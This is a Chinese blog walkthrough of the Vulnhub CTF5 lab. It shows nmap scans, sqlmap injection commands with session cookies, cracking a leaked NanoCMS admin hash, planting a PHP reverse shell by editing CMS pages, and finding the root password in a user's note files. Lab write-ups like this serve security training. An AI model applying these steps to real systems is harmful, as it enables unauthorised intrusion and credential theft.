ctf5 vulnhub靶场

文章描述了一次渗透测试的过程,从使用nmap进行端口扫描和主机发现,发现80端口的SQL注入漏洞,利用sqlmap工具进行exploit,然后通过NanoCMS的漏洞获取密码哈希,使用MD5解密得到密码,最终通过修改页面代码反弹shell并成功提权至root。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

不喜欢这关,这关太怪了

常规的端口扫描和主机发现

nmap -sP 192.168.181.0/24
nmap -p 1-65535 -A 192.168.181.151

在这里插入图片描述

在这里插入图片描述
查看80端口
在这里插入图片描述
目录扫描
在这里插入图片描述
把可疑的文件都看一看,比如list,mail之类的
先看看list
在这里插入图片描述
有输入框就有可能存在sql注入漏洞,手工探测一下,输个单引号看看
在这里插入图片描述
果然有
在这里插入图片描述
sqlmap注入

sqlmap -u "http://192.168.181.151/list/"  --level=5 --risk=3 --cookie="PHPSESSID=qgkr1p0r63kamvm57rikrpjbv2; SESS0cb31c2d501edfbab86442571b9718e7=sv07a8fcnk3s16f9c19r11g110; SQMSESSID=tc6fq9ijufuf3g0htpioiacou2"   --data="name=a&email=&phone=&org="

在这里插入图片描述

sqlmap -u "http://192.168.181.151/list/"  --level=5 --risk=3 --cookie="PHPSESSID=qgkr1p0r63kamvm57rikrpjbv2; SESS0cb31c2d501edfbab86442571b9718e7=sv07a8fcnk3s16f9c19r11g110; SQMSESSID=tc6fq9ijufuf3g0htpioiacou2"   --data="name=a&email=&phone=&org=" --dbs

在这里插入图片描述

到此为止了,后面啥都扫不出来,换个突破口吧

这个网站记录有NanoCMS的漏洞,密码哈希值泄露(为啥我不喜欢这个靶场,这个漏洞好难找啊到处都没有记录,还是看别人的过关记录才知道的这个漏洞的存在)

SecuritySpace

在这里插入图片描述
最后一行,有一个admin账户的密码哈希值,32位,应该是MD5

在这里插入图片描述

MD5免费在线解密破解_MD5在线加密-SOMD5

在这里插入图片描述

shannon

http://192.168.181.151/~andy/data/nanoadmin.php
登陆 admin
在这里插入图片描述

点击pages&options 选项,里面有两个php文件可以修改,刚好可以解释php语言,写入反弹shell

在这里插入图片描述

msf开启监听

访问修改后的url,反弹shell连接成功,顺便整个回显

在这里插入图片描述

sudo -l 和find提权都不行
查看/etc/passwd等等敏感文件也没啥有用信息

找了大半天,终于发现了点好东西

cd /home
ls
cd patrick
ls -a
cat .tomboy.log       查看日志文件

在这里插入图片描述

发现有人写入了root密码,还保存了notes

在这里插入图片描述

.tomboy目录下有几个note文件,都看看

cd .tomboy
ls
cat 481bca0d-7206-45dd-a459-a72ea1131329.note

发现密码了 50$cent

在这里插入图片描述

su root

提权成功

在这里插入图片描述
o了 😃

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值